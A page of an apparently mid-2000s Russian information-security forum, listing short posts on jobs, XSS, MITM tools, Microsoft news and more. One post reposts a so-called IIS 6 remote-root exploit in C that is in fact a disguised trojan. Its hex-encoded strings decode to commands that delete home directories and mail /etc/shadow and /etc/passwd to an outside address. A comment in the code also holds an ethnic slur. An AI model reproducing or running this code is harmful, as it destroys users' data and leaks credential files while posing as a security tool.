Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Выбрать дату в календареВыбрать дату в календаре

Страницы: Пред. 1 2 3 4 5 След.
Преподаватель курсов по ИБ
 
Есть вакансии на должность subj на постоянной основе.
Что читать

Резюме с темой "Резюме" отправлять по адресу:
edu@itsecurity.ru
MS заделал клиентский honeypot
 
Насколько я понял, куча XP хотящих по сети и автоматически кликающих по ссылкам. В качестве сылок выступает антиспайваре (если ты это ему разрешишь).
Отслеживается запуск кода на клиенте, и - сад.

Сцылка
Раскрытие данных в реализациях IPSec
 
Обсуждение статьи Раскрытие данных в реализациях IPSec
XSS в User-Agent????
 
Мож у кого есть идеи  как заэксплуатировать XSS в User-Agent в reflected а не stored варианте?
В f-d remote root для IIS 6 выложили :-)
 
Day Jay [d4yj4y@yahoo.com]

/* Proof of concept code
   Please dont send us e-mails
   asking us "how to hack" because
   we will be forced to skullfsck you.

DISCLAIMER:
!!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!

   IIS 6 Buffer Overflow Exploit

   BUG: inetinfo.exe improperly bound checks
   http requests sent longer than 6998 chars.
   Can get messy but enough testing, and we have
   found a way in.

   VENDOR STATUS: Notified
   FIX: In process

   Remote root.

   eg.
   #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
    + Connecting to host...
    + Connected.
    + Inserting Shellcode...
    + Done...
    + Spawining shell..

    Microsoft Windows XP [Version 5.1.2600]
   © Copyright 1985-2001 Microsoft Corp.
   C:\>



*/
char shellcode[] =
"\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
"\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
"\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
"\x72\x3b\x65\x63\x68\x6f\x20\x62"
"\x6c\x34\x63\x6b\x68\x34\x74\x2c"
"\x68\x65\x68\x65";

char launcher [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
"\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";

char netcat_shell [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
"\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";


main()
{

//Section Initialises designs implemented by mexicans //Imigrate system(launcher); system(netcat_shell); system(shellcode);

//int socket = 0;
//double long port = 0.0;

//#DEFINE port host address
//#DEFINE number of inters
//#DEFINE gull eeuEE

//     for(int j; j < 30; j++)
        {
        //Find socket remote address fault
        printf(".");
        }
//overtake inetinfo here IIS_666666^
return 0;
}
Тулза для продвинутого M-I-T-M
 
Нужна тулза для subj. Mitm рганизую сам - основное требование - перехват входящих пакетов, возможность их редактирования "на лету" в hex ascii. что - то было кажется у foundstone, но хоть убей - не помню.
Игрушечная железная дорога
 
Нужна какая-то штука, называемая Smoke oil или Smoke fluid для subj. Насколько я понял, это какая-то беда, заливаемая в паравозик что бы он дымил. Где такое счастье можно взять в москве?????
Комерциализация Open Source
 
Сегодня зашел на сервер нессуса и удивился - какой он симпотный стал. Сразу возникла мысль, что будут продавать.
Поковырялся и действительно - сам сканер бесплатный, но updates - либо на коммерческой основе, либо с задержкой в неделю. Беза с этим "бесплатным" софтом - не знаешь когда платить придётся :-)))
Переполнение буфера в WINS
 
Обсуждение статьи Переполнение буфера в WINS
Ай молодца Билли
 
сырец: http://biz.compulenta.ru/2004/11/17/51917/

Microsoft создаст в России электронное правительство
17 ноября 2004 года, 17:51
Текст: Иван Карташев
Российское подразделение Microsoft стало победителем в тендере Федерального
агентства по информационным технологиям на разработку концепции единой
архитектуры электронного правительства в России. Об этом агентство объявило 17
ноября 2004 г. Как отмечается в пресс-релизе, Microsoft имеет богатый
международный опыт в области консалтинга по вопросам реализации проектов
такого рода.

"Органы государственной власти и управления все более активно используют
информационные технологии. При этом в настоящее время актуальными являются
задачи предоставления гражданам и хозяйствующим субъектам услуг в электронной
форме, повышения эффективности бюджетных расходов на информационные
технологии, управления портфелем государственных программ и проектов в области
информатизации", - сказала Ольга Дергунова, президент Microsoft в России и
СНГ.

Проект под названием "Разработка концепции единой архитектуры "электронного
правительства" на базе защищенной телекоммуникационной среды для
государственных нужд, классификация и разработка основных профилей стандартов
в области информационно-технологического обеспечения деятельности органов
государственной власти" должен быть реализован до конца текущего года.
Предполагается продолжение работ в 2005 году.

Консультационные работы, которые окажут специалисты Microsoft для
осуществления данного проекта, будут финансироваться из федерального бюджета в
рамках реализации мероприятий федеральной целевой программы "Электронная
Россия (2002-2010 годы)" по направлению "Научно-исследовательские и
опытно-конструкторские работы".

Результатом реализации проекта станет разработка основных элементов методик
описания и плана разработки архитектуры электронного правительства России на
федеральном, региональном и муниципальном уровнях государственной власти с
учетом использования защищенной телекоммуникационной сети для государственных
нужд. Важным результатом проекта станет выработка методик управления
инвестициями в ИТ и управления портфелем государственных программ и проектов
информатизации. Отмечается, что успешное выполнение проекта, помимо
непосредственных практических результатов, будет также способствовать
повышению места Российской Федерации в различных международных рейтингах
реализации национальных инициатив в области электронного правительства и, тем
самым, способствовать повышению инвестиционной привлекательности.
Я возмущен!
 
Просто нет слов!
Предупреждение о ISA 2004
 
Господа, крайне не советую заморачиваться с сабжемыми site-to-site VPN. Весьма большой геморрой и бажнечиство.
Граблей более чем ещё по концовке не всё фунцикляет как надо...
В общем...
Metasploit Framework, часть третья.
 
Обсуждение статьи Metasploit Framework, часть третья.
Хакерам - пингвинофилам
 
Тут
Microsoft: Предъявите, пожалуйста, ваши права!
 
Обсуждение статьи Microsoft: Предъявите, пожалуйста, ваши права!
AOL отказалась поддерживать Microsoft Sender ID
 
Обсуждение статьи AOL отказалась поддерживать Microsoft Sender ID
Оценочная версия CP
 
Кто-нибудь знает, как официально получить оценочную версию Checkpoint 5?
К вопросу о конференция
 
Кто-нибудь знает, что это за тусовка?
Стоит подписываться на неё или как?
http://phpconf.ru
возможная работа
 
Вяло ищется человек в мск для работы в области технического анализа защищенности систем (аудита, аттестации). Требования - понимание корп. сетей, понятия о безопасности сетей, навыки работы со сканерами уязвимостей, наличие мозгов, желание учится. Работа стартаповская (в смысле  должность, а не контора), деньги небольшие.
Стучать в PM.
В России осужден первый спамер
 
Обсуждение статьи В России осужден первый спамер
Страницы: Пред. 1 2 3 4 5 След.